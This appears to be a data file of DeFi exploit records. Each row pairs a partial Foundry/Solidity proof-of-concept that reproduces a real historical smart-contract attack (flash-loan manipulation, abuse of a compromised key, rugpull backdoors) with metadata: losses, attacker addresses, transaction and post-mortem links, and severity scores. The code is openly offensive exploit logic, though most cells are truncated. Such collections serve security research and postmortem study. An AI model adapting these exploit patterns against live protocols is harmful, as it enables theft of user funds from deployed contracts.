... | true | ~800K USD$ | https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b | https://etherscan.io/address/0x0b09c86260c12294e3b967f0d523b4b2bcdfbeab | https://etherscan.io/address/0x9f72dc67cec672bb99e3d02cbea0a21536a2b657 | https://etherscan.io/tx/0xeb87ebc0a18aca7d2a9ffcabf61aa69c9e8d3c6efade9e2303f8857717fb9eb7 | https://sturdyfinance.medium.com/exploit-post-mortem-49261493307a | https://twitter.com/AnciliaInc/status/1668081008615325698 | $800.0K | 10 | high | Sturdy Exploit (2023-06) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
uint256 wCRES_amount = 130_000_000_000_000_000_000_000;
uint256 usdt_am... | exploit_poc | dodo_flashloan | 2021-03 | dodo_flashloan_exp.sol | flash_loan | 124bf22a388fb6d4 | 2026-01-07T10:59:16.513096 | postmortems | unknown | 12,000,000 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
address me = address(this);
dvm.flashLoan(wCRES_amount, usdt_amount, me, "whatever");
//emit log_named_uint("Exploit completed, WBNB Balance",wbnb.balanceOf(mywallet));
} | true | Unknown | 4.09 | low | dodo_flashloan Exploit (2021-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://paidnetwork.medium.com/paid-network-attack-postmortem-march-7-2021-9e4c0fef0e07
// Root cause: key compromised or rugged
// @TX
// https://etherscan.io/tx/0x4bb10927ea7afc... | exploit_poc | PAID | 2021-03 | PAID_exp.sol | null | 1835d33ab25a2a84 | 2026-01-07T10:59:16.513136 | postmortems | ethereum | 11,979,839 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
cheats.prank(0x18738290AF1Aaf96f0AcfA945C9C31aB21cd65bE);
PAID.mint(address(this), 59_471_745_571_000_000_000_000_000); //key compromised or rugged
emit log_named_decimal_uint("[End] PAID balance after exploitation:", PAID.balanceOf(address(this)), 18);
}
... | true | Unknown | 2.62 | low | PAID Exploit (2021-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IUNIPAIR is IERC20 {
function sync() external;
function getReserves() external returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
function swap(uint256... | exploit_poc | Snood | 2022-06 | Snood_exp.sol | null | d70a075ab1e676ac | 2026-01-07T10:59:16.513178 | postmortems | unknown | 14,983,660 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
// address attacker = vm.addr(1);
address attacker = 0x180ea08644b123D8A3f0ECcf2a3b45A582075538;
emit log("before the attack");
emit log_uint(WETH.balanceOf(attacker));
assertTrue(WETH.balanceOf(attacker) == 0);
uint256 balance = SNOOD.bal... | true | Unknown | 2.93 | low | Snood Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo
// Total Lost : 3087 ETH (~3,870,000 US$)
// Attacker Wallet : 0xb7cbb4d43f1e08327a90b32a8417688c9d0b800a
// Main Attack Contract : 0xf70f691d30ce23786cfb3a1522cfd76d159aca8d
// Vulner... | exploit_poc | XCarnival | 2022-06 | XCarnival_exp.sol | null | a0995a971b94dffb | 2026-01-07T10:59:16.513230 | postmortems | ethereum | 15,028,846 | 3087 ETH (~3,870,000 US$) | 3,087 | null | null | null | null | null | null | true | false | false | low | 3087 ETH (~3,870,000 US$) | unknown | function testExploit() public {
// Set msg.sender = 0xf70f691d30ce23786cfb3a1522cfd76d159aca8d (Main Attack Contract)
// Set tx.origin = 0xb7CBB4d43F1e08327A90B32A8417688C9D0B800a (Attacker)
cheat.startPrank(address(this), attacker);
emit log_string("[Exploit] Making pledged record...")... | true | $3.1K | 6 | medium | XCarnival Exploit (2022-06) | true | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
MultiSig Mul... | exploit_poc | Harmony_multisig | 2022-06 | Harmony_multisig_exp.sol | null | 02ca5f2ea69ba2bb | 2026-01-07T10:59:16.513292 | postmortems | ethereum | 15,012,645 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("USDT balance of attacker before Exploit", usdt.balanceOf(address(this)));
// Mulsig Case of compromised private key.
emit log_named_uint("How many approval required:", MultiSigWallet.required());
cheat.prank(0xf845A7ee8477AD1FB4446651E... | true | Unknown | 3.28 | low | Harmony_multisig Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface ProxyFactory {
function createProxy(address masterCopy, bytes calldata data) external returns (address payable proxy);
}
contract ContractTest is Test {
ProxyFactory proxy = Prox... | exploit_poc | Optimism | 2022-06 | Optimism_exp.sol | null | 30f7c69bfe25b139 | 2026-01-07T10:59:16.513334 | postmortems | unknown | 10,607,735 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
while (childcontract != 0x4f3a120E72C76c22ae802D129F599BFDbc31cb81) {
childcontract = proxy.createProxy(0xE7145dd6287AE53326347f3A6694fCf2954bcD8A, "0x");
emit log_named_address("Created Wintermute contract", childcontract);
}
} | true | Unknown | 2.46 | low | Optimism Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IERC20 WBTC = IERC20(0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599);
IERC20... | exploit_poc | InverseFinance | 2022-06 | InverseFinance_exp.sol | flash_loan | 92de15942a86b085 | 2026-01-07T10:59:16.513375 | postmortems | unknown | 14,972,418 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
aaveLendingPool.flashLoan(address(this), assets, amounts, modes, address(this), "0x", 0);
emit log_named_uint("After flashloan repaid, profit in WBTC of attacker:", WBTC.balanceOf(address(this)));
} | true | Unknown | 6 | medium | InverseFinance Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x6CD71A07E72C514f5d511651F6... | exploit_poc | Gym_2 | 2022-06 | Gym_2_exp.sol | null | 7f858922b169cb50 | 2026-01-07T10:59:16.513429 | postmortems | unknown | 18,501,049 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
gympool.depositFromOtherContract(8_000_000_000_000_000_000_000_666, 0, true, address(this));
cheat.warp(1_654_683_789);
gympool.withdraw(0);
emit log_named_uint("Exploit completed, GYMNET balance of attacker:", gymnet.balanceOf(address(this)));
} | true | Unknown | 2.47 | low | Gym_2 Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface ETHpledge {
function pledgein(address fatheraddr, uint256 amountt) external returns (bool);
}
// Expected error. [FAIL. Reason: Pancake: INSUFFICIENT_INPUT_AMOUNT]
// Because we don't... | exploit_poc | Discover | 2022-06 | Discover_exp.sol | null | 53e20da6dfcee438 | 2026-01-07T10:59:16.513467 | postmortems | unknown | 18,446,845 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
bytes memory data = abi.encode(address(this), 19_810_777_285_664_651_588_959);
emit log_named_uint("Before flashswap, BUSD balance of attacker:", busd.balanceOf(address(this)));
PancakePair2.swap(19_810_777_285_664_651_588_959, 0, address(this), data);
} | true | Unknown | 2.98 | low | Discover Exploit (2022-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
import "../interface.sol";
import "forge-std/Test.sol";
pragma solidity ^0.8.13;
contract ContractTest is Test {
address USDT = 0x55d398326f99059fF775485246999027B3197955;
address YDT= 0x3612e4Cb34617bCac849Add27366D8D85C102eFd;
address taxmodule =0x013E29791A230... | exploit_poc | YDTtoken | 2025-05 | YDTtoken_exp.sol | null | 13c9d6194b0bba8d | 2026-01-07T10:59:16.513506 | postmortems | unknown | 50,273,545 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 0.77 | low | YDTtoken Exploit (2025-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.25;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~9 K usdt
// Original Attacker : https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9
// Attack Contract : https://basescan.org/address/0x0c6a8c285d69... | exploit_poc | Unwarp | 2025-05 | Unwarp_exp.sol | flash_loan | 0786e3c9e299684b | 2026-01-07T10:59:16.513543 | postmortems | base | 30,210,273 | ~9 K usdt | 9,000 | https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9 | https://basescan.org/address/0x0c6a8c285d696d4d9b8dd4079a72a6460a4da05f | https://basescan.org/address/0x8befc1d90d03011a7d0b35b3a00ec50f8e014802 | https://app.blocksec.com/explorer/tx/base/0xac6f716c57bbb1a4c1e92f0a9531019ea2ecfcaea67794bbd27115d400ae9b41 | null | null | true | false | true | low | ~9 K usdt | flash-loan | function testExploit() public {
IERC20(WETH).approve(address(vault), type(uint256).max);
address[] memory assets = new address[](1);
assets[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 100852657473363426325;
bytes memory encodedata = abi.e... | true | ~9 K usdt | https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9 | https://basescan.org/address/0x0c6a8c285d696d4d9b8dd4079a72a6460a4da05f | https://basescan.org/address/0x8befc1d90d03011a7d0b35b3a00ec50f8e014802 | https://app.blocksec.com/explorer/tx/base/0xac6f716c57bbb1a4c1e92f0a9531019ea2ecfcaea67794bbd27115d400ae9b41 | $9.0K | 8 | medium | Unwarp Exploit (2025-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 105470 USDC
// Attacker : https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Tx : https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b... | exploit_poc | Nalakuvara_LotteryTicket50 | 2025-05 | Nalakuvara_LotteryTicket50_exp.sol | null | d6865de81f1f198f | 2026-01-07T10:59:16.513589 | postmortems | base | 30,001,613 | 105470 USDC | 105,470 | https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | null | null | https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b37caa12e2fc48923dba4e711d2094699 | null | null | true | true | false | high | 105470 USDC | unknown | function testExploit() public {
emit log_named_decimal_uint("USDC before attack", IUSDC(usdc).balanceOf(attacker), 6);
vm.prank(attacker);
AttackerC ac = new AttackerC{value: 0.2 ether}();
ac.attack();
vm.stopPrank();
emit log_named_decimal_uint("USDC after attack", IUS... | true | 105470 USDC | https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b37caa12e2fc48923dba4e711d2094699 | $105.5K | 6.9 | medium | Nalakuvara_LotteryTicket50 Exploit (2025-05) | true | false | true | false | ||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 69.6K USD
// Attacker :
// Attack Contract :
// Vulnerable Contract :
// Backdoor Tx : https://bscscan.com/tx/0x8c637fc98ad84b922e6301c0b697167963eee53bbdc19665f5d122ae55234ca6
// Rugpull Tx : https://bscsca... | exploit_poc | IRYSAI | 2025-05 | IRYSAI_exp.sol | null | fbaf5421efdd1210 | 2026-01-07T10:59:16.513643 | postmortems | bsc | 49,994,891 | 69.6K USD | 69,600 | null | null | null | null | https://x.com/TenArmorAlert/status/1925012844052975776 | https://x.com/TenArmorAlert/status/1925012844052975776 | true | true | false | medium | 69.6K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of addr3", address(addr3).balance, 18);
vm.startPrank(addr1, addr1);
addr3C attC = new addr3C();
IIRYSAI(IRYSAI).setTaxWallet(address(attC));
vm.startPrank(addr3, addr3);
attC.burn();
... | true | 69.6K USD | https://x.com/TenArmorAlert/status/1925012844052975776 | https://x.com/TenArmorAlert/status/1925012844052975776 | $69.6K | 5.78 | medium | IRYSAI Exploit (2025-05) | true | false | false | true | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 34.5 WETH ($88.1K)
// Attacker : https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff
// Attack Contract : https://basescan.org/address/0x7ee23c81995fe79... | exploit_poc | RICE | 2025-05 | RICE_exp.sol | null | ae2a8c003c7ed777 | 2026-01-07T10:59:16.513702 | postmortems | base | null | ~ 34.5 WETH ($88.1K) | 34.5 | https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff | https://basescan.org/address/0x7ee23c81995fe7992721ac14b3af522718b63f8f | https://basescan.org/address/0xcfe0de4a50c80b434092f87e106dfa40b71a5563 | https://basescan.org/tx/0x8421c96c1cafa451e025c00706599ef82780bdc0db7d17b6263511a420e0cf20 | null | https://x.com/TenArmorAlert/status/1926461662644633770 | true | true | false | low | ~ 34.5 WETH ($88.1K) | unknown | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
attackContract.start();
}
receive() external payable {
// Handle the received funds
}
}
contract AttackContract {
address attacker;
constructor() {
attacker = msg.sende... | true | ~ 34.5 WETH ($88.1K) | https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff | https://basescan.org/address/0x7ee23c81995fe7992721ac14b3af522718b63f8f | https://basescan.org/address/0xcfe0de4a50c80b434092f87e106dfa40b71a5563 | https://basescan.org/tx/0x8421c96c1cafa451e025c00706599ef82780bdc0db7d17b6263511a420e0cf20 | https://x.com/TenArmorAlert/status/1926461662644633770 | $34 | 8.62 | high | RICE Exploit (2025-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~2.16 M BUSD
// Original Attacker : https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600
// Attack Contract : https://bscscan.com/address/0x631adff068d48... | exploit_poc | MBUToken | 2025-05 | MBUToken_exp.sol | null | a4bd2beae47943ad | 2026-01-07T10:59:16.513760 | postmortems | bsc | 49,470,430 | ~2.16 M BUSD | 2,160,000 | https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600 | https://bscscan.com/address/0x631adff068d484ce531fb519cda4042805521641 | null | https://bscscan.com/tx/0x2a65254b41b42f39331a0bcc9f893518d6b106e80d9a476b8ca3816325f4a150 | null | null | true | false | false | critical | ~2.16 M BUSD | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
attC.attack{value: 1 ether}();
emit log_named_decimal_uint("Profit in BUSD", IERC20(BUSD).balanceOf(attacker), 18);
}
}
contract AttackerC { | true | ~2.16 M BUSD | https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600 | https://bscscan.com/address/0x631adff068d484ce531fb519cda4042805521641 | https://bscscan.com/tx/0x2a65254b41b42f39331a0bcc9f893518d6b106e80d9a476b8ca3816325f4a150 | $2.16M | 6.28 | medium | MBUToken Exploit (2025-05) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 7k USD
// Attacker : https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655
// Attack Contract : 0xd995edcab2efe3283514ff111cedc9aaff0349c8
// Vulnerable Cont... | exploit_poc | KRCToken_pair | 2025-05 | KRCToken_pair_exp.sol | flash_loan | 2ec3a19294dfeae1 | 2026-01-07T10:59:16.513803 | postmortems | bsc | null | 7k USD | 7,000 | https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655 | null | https://bscscan.com/address/0xdbead75d3610209a093af1d46d5296bbeffd53f5 | https://bscscan.com/tx/0x78f242dee5b8e15a43d23d76bce827f39eb3ac54b44edcd327c5d63de3848daf | https://x.com/OpenZeppelin/status/1953111764536561867 | https://x.com/CertikAIAgent/status/1924280794916536765 | true | true | true | low | 7k USD | flash-loan | function testExploit() public balanceLog {
// Step 1: Initial Flashloan from Dodo Private Pool
dodo_private_pool.flashLoan(0, dodo_borrow_amount, address(this), new bytes(1));
}
// Step 2: Dodo Flashloan Callback | true | 7k USD | https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655 | https://bscscan.com/address/0xdbead75d3610209a093af1d46d5296bbeffd53f5 | https://bscscan.com/tx/0x78f242dee5b8e15a43d23d76bce827f39eb3ac54b44edcd327c5d63de3848daf | https://x.com/OpenZeppelin/status/1953111764536561867 | https://x.com/CertikAIAgent/status/1924280794916536765 | $7.0K | 9.88 | high | KRCToken_pair Exploit (2025-05) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 43k USD
// Attacker : https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933
// Attack Contract : https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea
// Vulnerable ... | exploit_poc | UsualMoney | 2025-05 | UsualMoney_exp.sol | flash_loan | 7b6fde5fec8ad924 | 2026-01-07T10:59:16.513862 | postmortems | ethereum | null | 43k USD | 43,000 | https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933 | https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea | https://etherscan.io/address/0x35d8949372d46b7a3d5a56006ae77b215fc69bc0 | https://etherscan.io/tx/0x585d8be6a0b07ca2f94cfa1d7542f1a62b0d3af5fab7823cbcf69fb243f271f8 | https://www.quadrigainitiative.com/hackfraudscam/usualmoneyusdssyncvaultpricingarbitrageexploit.php | https://x.com/BlockSecTeam/status/1927601457815040283 | true | true | true | medium | 43k USD | flash-loan | function testExploit() public balanceLog {
// Approve UNI_V3_POS to spend sUSDS for minting liquidity position
sUSDS.approve(address(UNI_V3_POS), 10);
// Create and initialize Uniswap V3 pool for USD0/sUSDS if it doesn't exist
UNI_V3_POS.createAndInitializePoolIfNecessary(address(USD0), ... | true | 43k USD | https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933 | https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea | https://etherscan.io/address/0x35d8949372d46b7a3d5a56006ae77b215fc69bc0 | https://etherscan.io/tx/0x585d8be6a0b07ca2f94cfa1d7542f1a62b0d3af5fab7823cbcf69fb243f271f8 | https://www.quadrigainitiative.com/hackfraudscam/usualmoneyusdssyncvaultpricingarbitrageexploit.php | https://x.com/BlockSecTeam/status/1927601457815040283 | $43.0K | 10 | high | UsualMoney Exploit (2025-05) | true | true | true | true |
pragma solidity 0.8.26;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 12M USD
// Attacker : 0xea6f30e360192bae715599e15e2f765b49e4da98
// Attack Contract : https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09
// Vulnerable Contract :
// Attack Txs: https://app.... | exploit_poc | Corkprotocol | 2025-05 | Corkprotocol_exp.sol | null | 400264e5402e353e | 2026-01-07T10:59:16.513957 | postmortems | ethereum | 22,581,020 | 12M USD | 12,000,000 | null | https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09 | null | null | https://x.com/SlowMist_Team/status/1928100756156194955 | https://x.com/SlowMist_Team/status/1928100756156194955 | true | true | false | critical | 12M USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(WstETH).balanceOf(attacker), 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
// Approve in https://app.blocksec.com/explorer/tx/eth/0xb54308956e58fc124503e01eaae... | true | 12M USD | https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09 | https://x.com/SlowMist_Team/status/1928100756156194955 | https://x.com/SlowMist_Team/status/1928100756156194955 | $12.00M | 7 | medium | Corkprotocol Exploit (2025-05) | true | false | false | true | |||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
WETH9 WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
USDC usd... | exploit_poc | Mono | 2021-11 | Mono_exp.sol | null | d6c68040e8b24aaf | 2026-01-07T10:59:16.514039 | postmortems | unknown | 13,715,025 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
mono.approve(Monoswap_address, type(uint256).max);
WETH.deposit{value: address(this).balance, gas: 40_000}();
// WETH.balanceOf(address(this));
// VISR_Balance = visr.balanceOf(msg.sender);
emit log_named_uint("WETH Balance", WETH.balanceOf(addre... | true | Unknown | 4.04 | low | Mono Exploit (2021-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 365K
// Attacker : https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e
// Attack Contract : https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e18... | exploit_poc | Ploutoz | 2021-11 | Ploutoz_exp.sol | flash_loan | cceb6324ca1dc31e | 2026-01-07T10:59:16.514090 | postmortems | bsc | null | 365K | 365,000 | https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e | https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e185856d24 | https://bscscan.com/address/0x844fa82f1e54824655470970f7004dd90546bb28 | https://bscscan.com/tx/0x7fe46c2746855dd57e18f4d33522849ff192e4e26c74835799ba8dab89099457 | https://x.com/peckshield/status/1463113809111896065 | null | true | true | true | high | 365K | flash-loan | function testExploit() public balanceLog {
uint256 _amount0Out = 0;
uint256 _amount1Out = 1_000_400.0 ether;
IUniswapV2Pair(PancakeSwap).swap(_amount0Out, _amount1Out, address(this), "X");
swapLoanedTokenToStables();
} | true | 365K | https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e | https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e185856d24 | https://bscscan.com/address/0x844fa82f1e54824655470970f7004dd90546bb28 | https://bscscan.com/tx/0x7fe46c2746855dd57e18f4d33522849ff192e4e26c74835799ba8dab89099457 | https://x.com/peckshield/status/1463113809111896065 | $365.0K | 9.77 | high | Ploutoz Exploit (2021-11) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$67K
// Attacker : https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339
// Attack Contract : https://bscscan.com/address/0xb5eebf73448e22ce6a556f84836... | exploit_poc | BurnsDefi | 2024-02 | BurnsDefi_exp.sol | flash_loan | 7d1658da3991804e | 2026-01-07T10:59:16.514147 | postmortems | bsc | 35,858,189 | ~$67K | 67,000 | https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339 | https://bscscan.com/address/0xb5eebf73448e22ce6a556f848360057f6aadd4e7 | null | https://app.blocksec.com/explorer/tx/bsc/0x1d0af3a963682748493f21bf9e955ce3a950bee5817401bf2486db7a0af104b4 | null | null | true | true | true | medium | ~$67K | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
deal(address(this), 0);
emit log_named_decimal_uint(
"Exploiter BUSDT balance before attack", BUSDT.balanceOf(exploiter), BUSDT.decimals()
);
emit log_named_decimal_uint(
"Exploiter Bu... | true | ~$67K | https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339 | https://bscscan.com/address/0xb5eebf73448e22ce6a556f848360057f6aadd4e7 | https://app.blocksec.com/explorer/tx/bsc/0x1d0af3a963682748493f21bf9e955ce3a950bee5817401bf2486db7a0af104b4 | $67.0K | 9 | high | BurnsDefi Exploit (2024-02) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~170K USD$
// Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
// Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d... | exploit_poc | DeezNutz404 | 2024-02 | DeezNutz404_exp.sol | flash_loan | 413dc656801d5056 | 2026-01-07T10:59:16.514231 | postmortems | ethereum | 19,277,802 | ~170K USD$ | 170,000 | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0xb57e874082417b66877429481473cf9fcd8e0b8a#code | https://etherscan.io/tx/0xbeefd8faba2aa82704afe821fd41b670319203dd9090f7af8affdf6bcfec2d61 | null | null | true | true | true | high | ~170K USD$ | flash-loan | function testExploit() public {
address[] memory tokens = new address[](1);
tokens[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 2000 ether;
emit log_string("------------------- flashloan from balancer ---------");
vault.flashLoan(address(... | true | ~170K USD$ | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0xb57e874082417b66877429481473cf9fcd8e0b8a#code | https://etherscan.io/tx/0xbeefd8faba2aa82704afe821fd41b670319203dd9090f7af8affdf6bcfec2d61 | $170.0K | 8.6 | high | DeezNutz404 Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~18ETH
// Attacker : https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab
// Attack Contract : https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0d... | exploit_poc | GAIN | 2024-02 | GAIN_exp.sol | null | c7f3853843910d81 | 2026-01-07T10:59:16.514279 | postmortems | ethereum | 19,277,620 | ~18ETH | 18 | https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab | https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0db24932a4d5f38d0f | null | https://etherscan.io/tx/0x7acc896b8d82874c67127ff3359d7437a15fdb4229ed83da00da1f4d8370764e | null | null | true | true | false | low | ~18ETH | unknown | false | ~18ETH | https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab | https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0db24932a4d5f38d0f | https://etherscan.io/tx/0x7acc896b8d82874c67127ff3359d7437a15fdb4229ed83da00da1f4d8370764e | $18 | 4.36 | low | GAIN Exploit (2024-02) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~7729 $DAI $USDC
// Attacker : https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c
// Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
// Vulnerable Contract : https:/... | exploit_poc | SwarmMarkets | 2024-02 | SwarmMarkets_exp.sol | null | 1ba29e9396078d44 | 2026-01-07T10:59:16.514325 | postmortems | ethereum | 19,286,457 | ~7729 $DAI $USDC | 7,729 | https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0x2b9dc65253c035eb21778cb3898eab5a0ada0cce | https://etherscan.io/tx/0xc0be8c3792a5b1ba7d653dc681ff611a5b79a75fe51c359cf1aac633e9441574 | null | null | true | false | false | low | ~7729 $DAI $USDC | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker DAI balance before attack:", DAI.balanceOf(address(this)), 18);
emit log_named_decimal_uint("Attacker USDC balance before attack:", DAI.balanceOf(address(this)), 18);
